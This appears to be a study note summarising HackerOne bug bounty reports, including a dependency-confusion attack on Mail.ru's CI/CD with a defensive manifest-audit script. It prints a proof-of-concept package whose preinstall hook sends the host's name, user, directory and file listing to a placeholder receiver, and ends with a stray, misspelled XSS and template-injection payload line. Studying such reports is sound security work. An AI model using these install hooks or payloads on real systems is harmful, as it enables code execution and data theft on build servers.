Summary of HackerOne reports, to study and collect ideas.
- Shopify's GitHub access token exposure: leak of a GitHub OAuth account token
- Modify in-flight data to payment provider Smart2Pay: using the email address as the input to bypass the hash verification
- Mail.ru's RCE in CI/CD via dependency confusion: a "dependency confusion" bug, where the attacker-published package's code is executed on production servers while the CI/CD pipeline runs `npm install`.
```json
// package.json
{
  "name": "vulnerable-dependency",
  "version": "99.99.99",
  "description": "act1on3",
  "main": "index.js",
  "scripts": {
    "test": "echo \"Error: no test specified\" && exit 1",
    "preinstall": "./pre.sh"
  },
  "author": "",
  "license": "ISC"
}
```

```bash
# pre.sh
#!/bin/bash
curl -H "Hostname: $(hostname | base64)" -H "Whoami: $(whoami | base64)" -H "Pwd: $(pwd | base64)" -d $(ls -la | base64) http://receiver
```
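The two conditions the report above relies on are an unscoped internal package name (so the public registry can shadow it with a higher version) and a lifecycle hook that runs during install. As an added defender-side check, not code from the report, the following script audits a `package.json` for both; the manifest, the `@corp` scope and the list of internal package names are constructed assumptions.

```python
import json

# Constructed sample manifest for an internal project (not the report's real file).
# It lists the unscoped name used in the PoC above plus a properly scoped internal package.
SAMPLE_PACKAGE_JSON = """{
  "name": "internal-app",
  "dependencies": {
    "vulnerable-dependency": "1.2.0",
    "@corp/auth-lib": "2.3.1",
    "lodash": "4.17.21"
  },
  "scripts": {"preinstall": "./pre.sh", "test": "jest"}
}"""

# npm lifecycle hooks that execute arbitrary commands during `npm install`
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")


def audit_manifest(text, internal_names, private_scopes=("@corp",)):
    """Return a list of findings for a package.json manifest.

    internal_names: packages that are published only to the private registry.
    An internal package that is not under a private scope can be shadowed by a
    same-named public package with a higher version (dependency confusion).
    """
    manifest = json.loads(text)
    findings = []
    # 1. Any lifecycle hook is code that runs on the build host at install time.
    for hook in LIFECYCLE_HOOKS:
        cmd = manifest.get("scripts", {}).get(hook)
        if cmd:
            findings.append(f"lifecycle hook {hook!r} executes: {cmd}")
    # 2. Internal packages must be scoped so the scope can be pinned to the private registry.
    deps = {}
    for section in ("dependencies", "devDependencies", "optionalDependencies"):
        deps.update(manifest.get(section, {}))
    for name in deps:
        scoped = name.startswith(tuple(f"{s}/" for s in private_scopes))
        if name in internal_names and not scoped:
            findings.append(f"internal package {name!r} is unscoped; "
                            "public registry can shadow it")
    return findings


if __name__ == "__main__":
    for finding in audit_manifest(SAMPLE_PACKAGE_JSON, {"vulnerable-dependency", "@corp/auth-lib"}):
        print(finding)
```

Pairing the scoped names with an `.npmrc` entry such as `@corp:registry=<private registry URL>` is what makes the scope check meaningful; the script only reports, it does not change resolution.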
'''><svg/onlod=prompt(document.dmoain);>{{7*7}}